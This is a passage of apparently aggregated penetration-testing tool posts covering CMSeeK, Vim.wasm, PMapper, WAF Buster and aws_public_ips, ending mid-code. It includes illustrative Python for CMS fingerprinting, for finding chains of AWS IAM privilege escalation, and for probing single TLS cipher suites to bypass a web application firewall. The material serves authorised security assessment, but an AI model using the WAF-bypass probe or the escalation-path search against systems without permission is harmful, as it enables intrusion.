4. Open CMSeeK and Rebuild Cache using U as the input in the first menu.
If everything is done right you'll see something like this (refer to the screenshot below) and your module will be listed in the bruteforce menu the next time you open CMSeeK.

Need More Reasons To Use CMSeeK?
If nothing else, you can always enjoy exiting CMSeeK (please don't); it will bid you goodbye with a random goodbye message in various languages. Also you can try reading the comments in the code, those are pretty random and weird!!!

Screenshots:

Download CMSeeK
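The four detection sources listed above (HTTP headers, generator meta tag, page source, robots.txt), as an added example of how such fingerprinting works. This is not CMSeeK's code and the signatures are well-known public markers written here from scratch, not copied from cmss.py; the HTTP response it runs on is constructed inline, so nothing is fetched from the network.

```python
# Added example (not CMSeeK's code): CMS fingerprinting from the four sources
# the tool lists. Signatures are public, well-known markers, not cmss.py entries.
import re

SIGNATURES = {
    "WordPress": {
        "headers": [("link", r'rel="https://api\.w\.org/"')],
        "generator": r"^WordPress",
        "source": [r"/wp-content/", r"/wp-includes/"],
        "robots": [r"(?m)^Disallow:\s*/wp-admin/"],
    },
    "Joomla": {
        "headers": [],
        "generator": r"^Joomla!",
        "source": [r"/media/jui/", r"/components/com_"],
        "robots": [r"(?m)^Disallow:\s*/administrator/"],
    },
    "Drupal": {
        "headers": [("x-generator", r"^Drupal"), ("x-drupal-cache", r".")],
        "generator": r"^Drupal",
        "source": [r"/sites/default/files/", r"Drupal\.settings"],
        "robots": [r"(?m)^Disallow:\s*/core/"],
    },
}

def generator_tag(body: str) -> str:
    # Attribute order inside <meta> varies between sites, so parse the
    # attributes rather than matching one fixed layout.
    for tag in re.findall(r"<meta\b[^>]*>", body, re.I):
        attrs = {k.lower(): v for k, v in
                 re.findall(r'([\w-]+)\s*=\s*["\']([^"\']*)["\']', tag)}
        if attrs.get("name", "").lower() == "generator":
            return attrs.get("content", "")
    return ""

def fingerprint(headers: dict, body: str, robots: str = "") -> list:
    # Returns [(cms, score, evidence), ...], best match first; [] if no hit.
    # Header names are case-insensitive in HTTP, so normalise them.
    hdrs = {k.lower(): v for k, v in headers.items()}
    gen = generator_tag(body)
    results = []
    for cms, sig in SIGNATURES.items():
        evidence = []
        for name, pat in sig["headers"]:
            if name in hdrs and re.search(pat, hdrs[name], re.I):
                evidence.append(f"header {name}")
        if gen and re.search(sig["generator"], gen, re.I):
            evidence.append(f"generator meta tag: {gen}")
        for pat in sig["source"]:
            if re.search(pat, body, re.I):
                evidence.append(f"page source: {pat}")
        for pat in sig["robots"]:
            if robots and re.search(pat, robots, re.I):
                evidence.append(f"robots.txt: {pat}")
        if evidence:
            results.append((cms, len(evidence), evidence))
    return sorted(results, key=lambda r: -r[1])

def version_from_generator(body: str) -> str:
    # "WordPress 4.9.8" -> "4.9.8"; "" when the tag carries no version.
    m = re.search(r"\d+(?:\.\d+)+", generator_tag(body))
    return m.group(0) if m else ""

# Constructed sample response (not captured from any real site).
SAMPLE_HEADERS = {
    "Server": "nginx",
    "Link": '<https://example.test/wp-json/>; rel="https://api.w.org/"',
}
SAMPLE_BODY = """<html><head>
<meta content="WordPress 4.9.8" name="generator">
<script src="https://example.test/wp-includes/js/jquery/jquery.js"></script>
</head><body><img src="/wp-content/uploads/logo.png"></body></html>"""
SAMPLE_ROBOTS = "User-agent: *\nDisallow: /wp-admin/\nAllow: /wp-admin/admin-ajax.php\n"

if __name__ == "__main__":
    for cms, score, why in fingerprint(SAMPLE_HEADERS, SAMPLE_BODY, SAMPLE_ROBOTS):
        print(cms, score, why)
    print("version:", version_from_generator(SAMPLE_BODY))
```

Scoring by independent evidence sources matters because any single one is spoofable: a site can strip the generator tag or fake an X-Generator header, but it is much harder to hide the asset paths a CMS actually serves from.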

Link: http://feedproxy.google.com/~r/PentestTools/~3/NGGMG4yYz8A/cmseek-v109-cms-detection-and.html

Vim.Wasm – Vim Editor Ported To WebAssembly

This project is an experimental fork of the Vim editor by @rhysd to compile it into WebAssembly using emscripten and binaryen.

Try it with your browser

NOTICES
- Please access from a desktop browser (Chrome/Firefox/Safari/Edge). Safari seems the best on macOS.
- Please avoid slow networks. Your browser will fetch a total of around 1MB of files.
- vim.wasm takes key inputs from the DOM keydown event. Please disable your browser extensions which affect key inputs (incognito mode would be the best).
- This project is in a very early phase of experiment. Currently only tiny features are supported. More features will be implemented (please see the TODO section). And you may notice soon on trying it... it's buggy :)
- If inputting something does not change anything, please try to click somewhere in the page. Vim may have lost the focus.
- You can try vimtutor by :e tutor.

The goal of this project is running the Vim editor in a browser by compiling the Vim C sources into WebAssembly.

How It Works

Build Process
The WebAssembly frontend for Vim is implemented as a new GUI frontend. C sources are compiled to LLVM bitcode files and then linked into one bitcode file vim.bc by emcc. emcc finally compiles vim.bc into the vim.wasm binary using binaryen and generates the HTML/JavaScript runtime.

The difference I faced at first was the lack of a terminal library such as ncurses. I modified the configure script to ignore the terminal library check. It's OK since the GUI frontend for Wasm is always used instead of the CUI frontend. I needed many workarounds to pass configure checks.

emscripten provides a Unix-like environment, so os_unix.c can support Wasm. However, some features are not supported by emscripten. I added many #ifdef FEAT_GUI_WASM guards to disable features which cannot be supported by Wasm (i.e. fork(2) support, PTY support, signal handlers are stubbed, etc.).

I created gui_wasm.c heavily referencing gui_mac.c and gui_w32.c. The event loop (gui_mch_update() and gui_mch_wait_for_chars()) is simply implemented with sleep(). And almost all UI rendering events are passed to the JavaScript layer by calling JavaScript functions from C thanks to emscripten.

C sources are compiled (with many optimizations) into LLVM bitcode with the Clang integrated into emscripten. Then all bitcode files (.o) are linked into one bitcode file vim.bc with the llvm-link linker (also integrated into emscripten).

Finally I created a JavaScript runtime to draw the rendering events sent from C. It is created as wasm/runtime.ts using the emscripten API. It draws the Vim screen to a <canvas/> element with rendering events such as 'draw text', 'scroll screen', 'set foreground color', 'clear rect', etc.

emcc (emscripten's C compiler) compiles vim.bc into vim.wasm, vim.js and vim.html with preloaded Vim runtime files (i.e. colorschemes) using binaryen. Runtime files are put on a virtual file system provided by emscripten in the browser.

Now hosting vim.html with a web server and accessing it with a browser opens Vim. It works.

User Interaction
User interaction is very simple. You input something with the keyboard. The browser takes it as a KeyboardEvent on the keydown event and the JavaScript runtime sends the input to Wasm thanks to emscripten's JS-to-C API. The sent input is added to a buffer in the C layer. It affects the editor's state.

The editor core implemented in C calculates rendering events and sends them to the JavaScript layer thanks to emscripten's C-to-JS API. The JavaScript runtime receives the rendering events and stores them in a queue. On animation frames, it draws them to the <canvas/> element in the web page.

Finally you can see the rendered results in the page.

Download Vim.Wasm

Link: http://feedproxy.google.com/~r/PentestTools/~3/1vJYKge35tI/vimwasm-vim-editor-ported-to-webassembly.html

PMapper – A Tool For Quickly Evaluating IAM Permissions In AWS

A project to speed up the process of reviewing an AWS account's IAM configuration.

Purpose

The goal of the AWS IAM auth system is to apply and enforce access controls on actions and resources in AWS. This tool helps identify whether the policies in place actually accomplish the intent of the account's owners.

AWS already has tooling in place (the IAM policy simulation API) to check if the policies attached to a principal will permit an action. This tool builds on that functionality to identify other potential paths for a user to get access to a resource: it checks for access to other users, roles and services that can be used as pivots, so a principal's effective permissions are evaluated across everything it can reach, not only the policies attached to it directly.

How to Use

1. Download this repository and install its dependencies with pip install -r requirements.txt.
2. Ensure you have graphviz installed on your host.
3. Set up an IAM user in your AWS account with a policy that grants the permissions needed to run this tool (see the file mapper-policy.json for an example). The ReadOnlyAccess managed policy also works for this purpose, although it grants far more read access than the tool needs. Grab the access keys created for this user; they are long-lived credentials with read access to the whole account, so store them accordingly and delete the user when the review is done.
4. In the AWS CLI, set up a profile for that IAM user with the command aws configure --profile <profile_name>, where <profile_name> is a unique name.
5. Run the command python pmapper.py --profile <profile_name> graph to begin pulling data about your account down to your computer.

Graphing

Principal Mapper has a graph subcommand, which does the heavy work of going through each principal in an account and finding any other principals it can access. The results are stored at ~/.principalmap and used by the other subcommands.

Querying

Principal Mapper has a query subcommand that runs a user-defined query. The queries can check if one or more principals can do a given action with a given resource. The supported queries are:

"can <Principal> do <Action> [with <Resource>]"
"who can do <Action> [with <Resource>]"
"preset <preset_query_name> <preset_query_args>"

The first form checks if a principal, or any other principal accessible to it, could perform an action with a resource (default wildcard). The second form enumerates all principals that are able to perform an action with a resource.

Note the quotes around the full query; they are there so the argument parser knows to take the whole string. Note also that <Principal> can be either the full ARN of a principal or the last part of that ARN (user/... or role/...).

Presets

The existing presets are priv_esc and change_perms, which have the same function. They describe which principals have the ability to change their own permissions. If a principal is able to change its own permissions, it effectively has unlimited permissions, so any path that reaches such a principal is a path to full control of the account.

Visualizing

The visualize subcommand produces a DOT and an SVG file that represent the nodes and edges that were graphed. To create the DOT and SVG files, run the command: python pmapper.py visualize

Currently the output is a directed graph, which collates all the edges with the same source and destination nodes. It does not draw edges where the source is an admin. Nodes for admins are colored blue. Nodes for users with the ability to access admins are colored red (potential priv-esc risk).

Sample Output

Pulling a Graph

~/Documents/projects/Skywalker$ python pmapper.py graph
Using profile: skywalker
Pulling data for account [REDACTED]
Using principal with ARN arn:aws:iam::[REDACTED]:user/TestingSkywalker
[+] Starting EC2 checks.
[+] Starting IAM checks.
[+] Starting Lambda checks.
[+] Starting CloudFormation checks.
[+] Completed CloudFormation checks.
[+] Completed EC2 checks.
[+] Completed Lambda checks.
[+] Completed IAM checks.
Created an AWS Graph with 16 nodes and 53 edges
[NODES]
AWSNode("arn:aws:iam::[REDACTED]:user/AdminUser", properties={u'is_admin': True, u'type': u'user'})
AWSNode("arn:aws:iam::[REDACTED]:user/EC2Manager", properties={u'is_admin': False, u'type': u'user'})
AWSNode("arn:aws:iam::[REDACTED]:user/LambdaDeveloper", properties={u'is_admin': False, u'type': u'user'})
AWSNode("arn:aws:iam::[REDACTED]:user/LambdaFullAccess", properties={u'is_admin': False, u'type': u'user'})
AWSNode("arn:aws:iam::[REDACTED]:user/PowerUser", properties={u'is_admin': False, u'rootstr': u'arn:aws:iam::[REDACTED]:root', u'type': u'user'})
AWSNode("arn:aws:iam::[REDACTED]:user/S3ManagementUser", properties={u'is_admin': False, u'type': u'user'})
AWSNode("arn:aws:iam::[REDACTED]:user/S3ReadOnly", properties={u'is_admin': False, u'type': u'user'})
AWSNode("arn:aws:iam::[REDACTED]:user/TestingSkywalker", properties={u'is_admin': False, u'type': u'user'})
AWSNode("arn:aws:iam::[REDACTED]:role/AssumableRole", properties={u'is_admin': False, u'type': u'role', u'name': u'AssumableRole'})
AWSNode("arn:aws:iam::[REDACTED]:role/EC2-Fleet-Manager", properties={u'is_admin': False, u'type': u'role', u'name': u'EC2-Fleet-Manager'})
AWSNode("arn:aws:iam::[REDACTED]:role/EC2Role-Admin", properties={u'is_admin': True, u'type': u'role', u'name': u'EC2Role-Admin'})
AWSNode("arn:aws:iam::[REDACTED]:role/EC2WithS3ReadOnly", properties={u'is_admin': False, u'type': u'role', u'name': u'EC2WithS3ReadOnly'})
AWSNode("arn:aws:iam::[REDACTED]:role/EMR-Service-Role", properties={u'is_admin': False, u'type': u'role', u'name': u'EMR-Service-Role'})
AWSNode("arn:aws:iam::[REDACTED]:role/LambdaRole-S3ReadOnly", properties={u'is_admin': False, u'type': u'role', u'name': u'LambdaRole-S3ReadOnly'})
AWSNode("arn:aws:iam::[REDACTED]:role/ReadOnlyWithLambda", properties={u'is_admin': False, u'type': u'role', u'name': u'ReadOnlyWithLambda'})
AWSNode("arn:aws:iam::[REDACTED]:role/UpdateCredentials", properties={u'is_admin': False, u'type': u'role', u'name': u'UpdateCredentials'})
[EDGES]
(0,1,'ADMIN','can use existing administrative privileges to access')
(0,2,'ADMIN','can use existing administrative privileges to access')
(0,3,'ADMIN','can use existing administrative privileges to access')
(0,4,'ADMIN','can use existing administrative privileges to access')
(0,5,'ADMIN','can use existing administrative privileges to access')
(0,6,'ADMIN','can use existing administrative privileges to access')
(0,7,'ADMIN','can use existing administrative privileges to access')
(0,8,'ADMIN','can use existing administrative privileges to access')
(0,9,'ADMIN','can use existing administrative privileges to access')
(0,10,'ADMIN','can use existing administrative privileges to access')
(0,11,'ADMIN','can use existing administrative privileges to access')
(0,12,'ADMIN','can use existing administrative privileges to access')
(0,13,'ADMIN','can use existing administrative privileges to access')
(0,14,'ADMIN','can use existing administrative privileges to access')
(0,15,'ADMIN','can use existing administrative privileges to access')
(10,0,'ADMIN','can use existing administrative privileges to access')
(10,1,'ADMIN','can use existing administrative privileges to access')
(10,2,'ADMIN','can use existing administrative privileges to access')
(10,3,'ADMIN','can use existing administrative privileges to access')
(10,4,'ADMIN','can use existing administrative privileges to access')
(10,5,'ADMIN','can use existing administrative privileges to access')
(10,6,'ADMIN','can use existing administrative privileges to access')
(10,7,'ADMIN','can use existing administrative privileges to access')
(10,8,'ADMIN','can use existing administrative privileges to access')
(10,9,'ADMIN','can use existing administrative privileges to access')
(10,11,'ADMIN','can use existing administrative privileges to access')
(10,12,'ADMIN','can use existing administrative privileges to access')
(10,13,'ADMIN','can use existing administrative privileges to access')
(10,14,'ADMIN','can use existing administrative privileges to access')
(10,15,'ADMIN','can use existing administrative privileges to access')
(1,9,'EC2_USEPROFILE','can create an EC2 instance and use an existing instance profile to access')
(1,10,'EC2_USEPROFILE','can create an EC2 instance and use an existing instance profile to access')
(1,11,'EC2_USEPROFILE','can create an EC2 instance and use an existing instance profile to access')
(4,9,'EC2_USEPROFILE','can create an EC2 instance and use an existing instance profile to access')
(4,10,'EC2_USEPROFILE','can create an EC2 instance and use an existing instance profile to access')
(4,11,'EC2_USEPROFILE','can create an EC2 instance and use an existing instance profile to access')
(3,13,'LAMBDA_CREATEFUNCTION','can create a Lambda function and pass an execution role to access')
(3,14,'LAMBDA_CREATEFUNCTION','can create a Lambda function and pass an execution role to access')
(3,15,'LAMBDA_CREATEFUNCTION','can create a Lambda function and pass an execution role to access')
(9,10,'EC2_USEPROFILE','can create an EC2 instance and use an existing instance profile to access')
(4,13,'LAMBDA_CREATEFUNCTION','can create a Lambda function and pass an execution role to access')
(9,11,'EC2_USEPROFILE','can create an EC2 instance and use an existing instance profile to access')
(4,8,'STS_ASSUMEROLE','can use STS to assume the role')
(4,14,'LAMBDA_CREATEFUNCTION','can create a Lambda function and pass an execution role to access')
(4,15,'LAMBDA_CREATEFUNCTION','can create a Lambda function and pass an execution role to access')
(15,0,'IAM_CREATEKEY','can create access keys with IAM to access')
(15,1,'IAM_CREATEKEY','can create access keys with IAM to access')
(15,2,'IAM_CREATEKEY','can create access keys with IAM to access')
(15,3,'IAM_CREATEKEY','can create access keys with IAM to access')
(15,4,'IAM_CREATEKEY','can create access keys with IAM to access')
(15,5,'IAM_CREATEKEY','can create access keys with IAM to access')
(15,6,'IAM_CREATEKEY','can create access keys with IAM to access')
(15,7,'IAM_CREATEKEY','can create access keys with IAM to access')

Querying with the Graph

~/Documents/projects/Skywalker$ ./pmapper.py --profile skywalker query "who can do s3:GetObject with *"
user/AdminUser can do s3:GetObject with *
user/EC2Manager can do s3:GetObject with * through role/EC2Role-Admin
   user/EC2Manager can create an EC2 instance and use an existing instance profile to access role/EC2Role-Admin
   role/EC2Role-Admin can do s3:GetObject with *
user/LambdaFullAccess can do s3:GetObject with *
user/PowerUser can do s3:GetObject with *
user/S3ManagementUser can do s3:GetObject with *
user/S3ReadOnly can do s3:GetObject with *
user/TestingSkywalker can do s3:GetObject with *
role/EC2-Fleet-Manager can do s3:GetObject with * through role/EC2Role-Admin
   role/EC2-Fleet-Manager can create an EC2 instance and use an existing instance profile to access role/EC2Role-Admin
   role/EC2Role-Admin can do s3:GetObject with *
role/EC2Role-Admin can do s3:GetObject with *
role/EC2WithS3ReadOnly can do s3:GetObject with *
role/EMR-Service-Role can do s3:GetObject with *
role/LambdaRole-S3ReadOnly can do s3:GetObject with *
role/UpdateCredentials can do s3:GetObject with * through user/AdminUser
   role/UpdateCredentials can create access keys with IAM to access user/AdminUser
   user/AdminUser can do s3:GetObject with *

Identifying Potential Privilege Escalation

~/Documents/projects/Skywalker$ ./pmapper.py --profile skywalker query "preset priv_esc user/PowerUser"
Discovered a potential path to change privileges:
user/PowerUser can change privileges because:
   user/PowerUser can access role/EC2Role-Admin because:
      user/PowerUser can create an EC2 instance and use an existing instance profile to access role/EC2Role-Admin
   and role/EC2Role-Admin can change its own privileges.

Planned TODOs

- Complete and verify Python 3 support.
- Smarter control over the rate of API requests (queue, managing throttles).
- Better progress reporting.
- Validate and add more checks for obtaining credentials. Several services use service roles that grant the service permission to do an action within a user's account. This could potentially allow a user to obtain access to additional privileges.
- Improving simulate calls (global conditions).
- Completing priv esc checks (editing attached policies, attaching to a group).
- Adding options for visualization (output type, edge collation).
- Adding more caching.
- Local policy evaluation?
- Cross-account subcommand(s).
- A preset to check if one principal is connected to another.
- Handling policies for buckets or keys with services like S3 or KMS when querying.

Download PMapper
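To make the pivot search concrete, here is an added example (not PMapper's own code) that loads the nodes and the non-ADMIN edges transcribed from the sample graph above and runs a breadth-first search from each principal to the nearest admin. It generalizes the one-hop explanation the priv_esc preset prints above to chains of any length; the principal names, edge types and admin flags come from the sample output, and the ADMIN edges are deliberately left out because an admin already reaches everything. Everything else (function names, output format) is this example's own.

```python
"""Transitive pivot search over a PMapper-style principal graph (added example)."""
from collections import deque
from typing import Dict, List, Optional, Tuple

# The 16 nodes of the sample graph, in the index order PMapper printed them.
NODES: List[str] = [
    "user/AdminUser", "user/EC2Manager", "user/LambdaDeveloper",          # 0-2
    "user/LambdaFullAccess", "user/PowerUser", "user/S3ManagementUser",    # 3-5
    "user/S3ReadOnly", "user/TestingSkywalker", "role/AssumableRole",      # 6-8
    "role/EC2-Fleet-Manager", "role/EC2Role-Admin", "role/EC2WithS3ReadOnly",  # 9-11
    "role/EMR-Service-Role", "role/LambdaRole-S3ReadOnly",                 # 12-13
    "role/ReadOnlyWithLambda", "role/UpdateCredentials",                   # 14-15
]
ADMINS = {"user/AdminUser", "role/EC2Role-Admin"}   # is_admin: True in the sample

REASONS = {
    "EC2_USEPROFILE": "can create an EC2 instance and use an existing instance profile to access",
    "LAMBDA_CREATEFUNCTION": "can create a Lambda function and pass an execution role to access",
    "STS_ASSUMEROLE": "can use STS to assume the role",
    "IAM_CREATEKEY": "can create access keys with IAM to access",
}
# (src, dst, edge type) for every non-ADMIN edge in the sample [EDGES] listing.
RAW_EDGES: List[Tuple[int, int, str]] = (
    [(1, d, "EC2_USEPROFILE") for d in (9, 10, 11)]
    + [(4, d, "EC2_USEPROFILE") for d in (9, 10, 11)]
    + [(3, d, "LAMBDA_CREATEFUNCTION") for d in (13, 14, 15)]
    + [(9, 10, "EC2_USEPROFILE"), (4, 13, "LAMBDA_CREATEFUNCTION"),
       (9, 11, "EC2_USEPROFILE"), (4, 8, "STS_ASSUMEROLE"),
       (4, 14, "LAMBDA_CREATEFUNCTION"), (4, 15, "LAMBDA_CREATEFUNCTION")]
    + [(15, d, "IAM_CREATEKEY") for d in range(8)]
)

Graph = Dict[str, List[Tuple[str, str]]]
Chain = List[Tuple[str, Optional[str]]]   # [(principal, edge type used to leave it), ...]


def build_graph(edges=RAW_EDGES) -> Graph:
    """Adjacency list: principal -> [(reachable principal, edge type)], insertion-ordered."""
    graph: Graph = {name: [] for name in NODES}
    for src, dst, kind in edges:
        graph[NODES[src]].append((NODES[dst], kind))
    return graph


def path_to_admin(graph: Graph, start: str, admins=ADMINS) -> Optional[Chain]:
    """Shortest chain of pivots from `start` to any admin, or None if no path exists.

    Breadth-first, so the first admin discovered is at the minimal hop count; the
    last element of the returned chain is the admin with edge type None.
    """
    if start in admins:
        return [(start, None)]
    parent: Dict[str, Optional[Tuple[str, str]]] = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        for nxt, kind in graph.get(node, []):
            if nxt in parent:
                continue                      # already reached by a shorter route
            parent[nxt] = (node, kind)
            if nxt in admins:
                return _unwind(parent, nxt)
            queue.append(nxt)
    return None


def _unwind(parent, end: str) -> Chain:
    chain: Chain = [(end, None)]
    node = end
    while parent[node] is not None:
        prev, kind = parent[node]
        chain.append((prev, kind))
        node = prev
    return list(reversed(chain))


def who_can_reach_admin(graph: Graph, admins=ADMINS) -> List[str]:
    """Every non-admin principal with some chain of pivots to an admin."""
    return [n for n in NODES if n not in admins and path_to_admin(graph, n, admins) is not None]


def explain(chain: Chain) -> str:
    """Render a chain one hop per line, in the wording of PMapper's query output."""
    return "\n".join(f"{node} {REASONS[kind]} {nxt}"
                     for (node, kind), (nxt, _) in zip(chain, chain[1:]))


if __name__ == "__main__":
    g = build_graph()
    for principal in who_can_reach_admin(g):
        print(f"{principal} can reach an admin because:")
        print("   " + explain(path_to_admin(g, principal)).replace("\n", "\n   "))
```

Running it lists five non-admin principals with a route to an admin. Four of them are single hops visible in the edge list; the fifth, user/LambdaFullAccess, needs two (create a Lambda function with role/UpdateCredentials as its execution role, then use that role to mint access keys for user/AdminUser), which is exactly the kind of chain a reviewer reading the per-principal policies would miss.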

Link: http://feedproxy.google.com/~r/PentestTools/~3/Ifx-LagyHdo/pmapper-tool-for-quickly-evaluating-iam.html

WAF Buster – Disrupt WAF By Abusing SSL/TLS Ciphers

About WAF_buster

This tool was created to analyze the ciphers that are supported by the web application firewall sitting in front of a web server (reference: https://0x09al.github.io/waf/bypass/ssl/2018/07/02/web-application-firewall-bypass.html). It works by first running sslscan to enumerate all the cipher suites accepted during SSL/TLS negotiation with the web server. With that list saved to a text file, it then uses curl to request the web server once per cipher, checking which ciphers are unsupported by the WAF but supported by the web server. If such a cipher is found, the message "Firewall is bypassed" is displayed: a request negotiated with that cipher reaches the web server without passing through the WAF's inspection.

Installation

git clone https://github.com/viperbluff/WAF_buster.git

Python2

This tool has been created using Python 2, and the following modules are used throughout: requests, os, sys, subprocess.

Usage

Open a terminal and run: python2 WAF_buster.py --input

Download WAF_buster
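As an added example (not WAF_buster's own code), the Python 3 script below shows the two halves of the technique: parsing sslscan's cipher table, and re-probing the endpoint with a single suite pinned so that the handshake can only succeed with that suite. The two sslscan listings are constructed for the example, not real scans; the comparison between an origin scan and a WAF-edge scan assumes you can scan both hosts, and the host name passed to probe_cipher is whatever you are testing.

```python
"""Enumerate accepted cipher suites and re-probe each one individually (added example)."""
import re
import socket
import ssl
from typing import List, Optional, Tuple

# Matches the "Preferred"/"Accepted" rows of sslscan's "Supported Server Cipher(s)" table.
CIPHER_LINE = re.compile(
    r"^(?:Preferred|Accepted)\s+(SSLv\d|TLSv1\.\d)\s+\d+ bits\s+(\S+)", re.MULTILINE
)

# Constructed sslscan-style output for a hypothetical origin server ...
ORIGIN_SCAN = """\
  Supported Server Cipher(s):
Preferred TLSv1.3  256 bits  TLS_AES_256_GCM_SHA384        Curve 25519 DHE 253
Accepted  TLSv1.3  128 bits  TLS_AES_128_GCM_SHA256        Curve 25519 DHE 253
Preferred TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384   Curve 25519 DHE 253
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-GCM-SHA256   Curve 25519 DHE 253
Accepted  TLSv1.2  256 bits  AES256-SHA256
Accepted  TLSv1.2  256 bits  DHE-RSA-AES256-SHA
"""
# ... and for the WAF edge in front of it, which supports a narrower set.
WAF_SCAN = """\
  Supported Server Cipher(s):
Preferred TLSv1.3  256 bits  TLS_AES_256_GCM_SHA384        Curve 25519 DHE 253
Preferred TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384   Curve 25519 DHE 253
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-GCM-SHA256   Curve 25519 DHE 253
"""


def parse_sslscan(output: str) -> List[Tuple[str, str]]:
    """(protocol, cipher) for every accepted row, in the order sslscan printed them."""
    return [(m.group(1), m.group(2)) for m in CIPHER_LINE.finditer(output)]


def bypass_candidates(origin_scan: str, waf_scan: str) -> List[Tuple[str, str]]:
    """Suites the origin accepts but the WAF edge does not: the ones worth probing."""
    waf = set(parse_sslscan(waf_scan))
    return [pair for pair in parse_sslscan(origin_scan) if pair not in waf]


def probe_cipher(host: str, cipher: str, protocol: str,
                 port: int = 443, timeout: float = 5.0) -> Optional[Tuple[str, str]]:
    """Pin one suite, send a minimal GET, return (negotiated cipher, HTTP status line).

    Returns None if the handshake is refused. TLS 1.3 suites are skipped because the
    ssl module's set_ciphers() only governs the TLS 1.2-and-below list; probing those
    needs a client that can pin TLS 1.3 suites (for example curl --tls13-ciphers).
    """
    if protocol == "TLSv1.3":
        return None
    ctx = ssl.create_default_context()
    ctx.maximum_version = ssl.TLSVersion.TLSv1_2   # stop 1.3 from overriding the pinned suite
    ctx.set_ciphers(cipher)                        # raises ssl.SSLError on an unknown name
    request = f"GET / HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n".encode()
    try:
        with socket.create_connection((host, port), timeout=timeout) as raw:
            with ctx.wrap_socket(raw, server_hostname=host) as tls:
                tls.sendall(request)
                status = tls.recv(4096).split(b"\r\n", 1)[0].decode(errors="replace")
                return tls.cipher()[0], status
    except (ssl.SSLError, OSError):
        return None


if __name__ == "__main__":
    for proto, suite in bypass_candidates(ORIGIN_SCAN, WAF_SCAN):
        print(proto, suite, probe_cipher("waf-fronted.example", suite, proto))
```

Feed it real output by running sslscan with --no-colour so the table is free of ANSI escapes. A candidate suite that both completes the handshake and returns an origin response is the condition WAF_buster reports as "Firewall is bypassed"; confirm it by repeating the request with a payload the WAF is known to block.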

Link: http://feedproxy.google.com/~r/PentestTools/~3/0fQO7UVapz0/waf-buster-disrupt-waf-by-abusing.html

Aws_Public_Ips – Fetch All Public IP Addresses Tied To Your AWS Account

aws_public_ips is a tool to fetch all public IP addresses (both IPv4 and IPv6) associated with an AWS account.

It can be used as a library and as a CLI, and supports the following AWS services (all with both Classic and VPC flavors):

- APIGateway
- CloudFront
- EC2 (and as a result: ECS, EKS, Beanstalk, Fargate, Batch and NAT Instances)
- ElasticSearch
- ELB (Classic ELB)
- ELBv2 (ALB/NLB)
- Lightsail
- RDS
- Redshift

If a service isn't listed (S3, ElastiCache, etc.) it's most likely because there is nothing to support: it might not be deployable publicly, or all of its IP addresses might resolve to shared AWS infrastructure rather than to anything owned by the account.

Quick start

Install the gem and run it:

$ gem install aws_public_ips

# Uses default ~/.aws/credentials
$ aws_public_ips
52.84.11.13
52.84.11.83
2600:9000:2039:ba00:1a:cd27:1440:93a1
2600:9000:2039:6e00:1a:cd27:1440:93a1

# With a custom profile
$ AWS_PROFILE=production aws_public_ips
52.84.11.159

CLI reference

$ aws_public_ips --help
Usage: aws_public_ips [options]
    -s, --services <s1>,<s2>,<s3>    List of AWS services to check. Available services: apigateway,cloudfront,ec2,elasticsearch,elb,elbv2,lightsail,rds,redshift. Defaults to all.
    -f, --format <format>            Set output format. Available formats: json,prettyjson,text. Defaults to text.
    -v, --[no-]verbose               Enable debug/trace output
        --version                    Print version
    -h, --help                       Show this help message

Configuration

For authentication aws_public_ips uses the default aws-sdk-ruby configuration, meaning that the following are checked in order:

1. Environment variables: AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, AWS_REGION, AWS_PROFILE
2. Shared credentials files: ~/.aws/credentials, ~/.aws/config
3. Instance profile via the metadata endpoint (if running on EC2, ECS, EKS or Fargate)

For more information see the AWS SDK documentation on configuration.

IAM permissions

To find the public IPs from all AWS services, the minimal policy needed by your IAM user is:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "apigateway:GET",
        "cloudfront:ListDistributions",
        "ec2:DescribeInstances",
        "elasticloadbalancing:DescribeLoadBalancers",
        "lightsail:GetInstances",
        "lightsail:GetLoadBalancers",
        "rds:DescribeDBInstances",
        "redshift:DescribeClusters"
      ],
      "Resource": "*"
    }
  ]
}

Every action in this policy is a read-only Describe, List or Get call, so the user it is attached to can enumerate the account's public endpoints but cannot change anything.

Contact

Feel free to tweet or direct message: @arkadiyt

Download Aws_Public_Ips
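The EC2 entry covers most of the service list above because ECS, EKS, Beanstalk, Fargate, Batch and NAT instances all surface their addresses through the same DescribeInstances call. As an added example that is not part of aws_public_ips (which is written in Ruby), the Python snippet below extracts public IPv4 and IPv6 addresses from a DescribeInstances response, looking in the three places EC2 reports them: the instance's PublicIpAddress, the Association.PublicIp on each network interface (where an Elastic IP on a secondary interface shows up), and the Ipv6Addresses on each interface. The response dict is constructed to the shape boto3 returns and reuses the addresses from the quick-start output above as sample data; the instance IDs are made up, and fetch_ec2_public_ips is a live wrapper that needs boto3, credentials and the ec2:DescribeInstances permission from the policy above.

```python
"""Extract public IPv4/IPv6 addresses from an EC2 DescribeInstances response (added example)."""
import ipaddress
from typing import Dict, List, Optional

# Constructed sample in boto3's describe_instances() shape: one reservation, two instances.
SAMPLE_DESCRIBE_INSTANCES: Dict = {
    "Reservations": [
        {
            "Instances": [
                {
                    "InstanceId": "i-0123456789abcdef0",
                    "PublicIpAddress": "52.84.11.13",
                    "NetworkInterfaces": [
                        {   # primary ENI: same public IPv4 as PublicIpAddress, plus an IPv6 address
                            "Association": {"PublicIp": "52.84.11.13"},
                            "Ipv6Addresses": [{"Ipv6Address": "2600:9000:2039:ba00:1a:cd27:1440:93a1"}],
                        },
                        {   # secondary ENI with its own Elastic IP, not reflected in PublicIpAddress
                            "Association": {"PublicIp": "52.84.11.83"},
                            "Ipv6Addresses": [],
                        },
                    ],
                },
                {   # private-only instance: no PublicIpAddress, no Association, nothing to report
                    "InstanceId": "i-0fedcba9876543210",
                    "PrivateIpAddress": "10.0.1.25",
                    "NetworkInterfaces": [{"Ipv6Addresses": []}],
                },
            ]
        }
    ]
}


def ec2_public_ips(response: Dict) -> List[str]:
    """Unique globally routable addresses from one DescribeInstances page, in first-seen order."""
    found: List[str] = []

    def add(addr: Optional[str]) -> None:
        # is_global rejects RFC 1918, link-local and other non-routable ranges, so a
        # misfiled private address never ends up in the "public" inventory.
        if addr and addr not in found and ipaddress.ip_address(addr).is_global:
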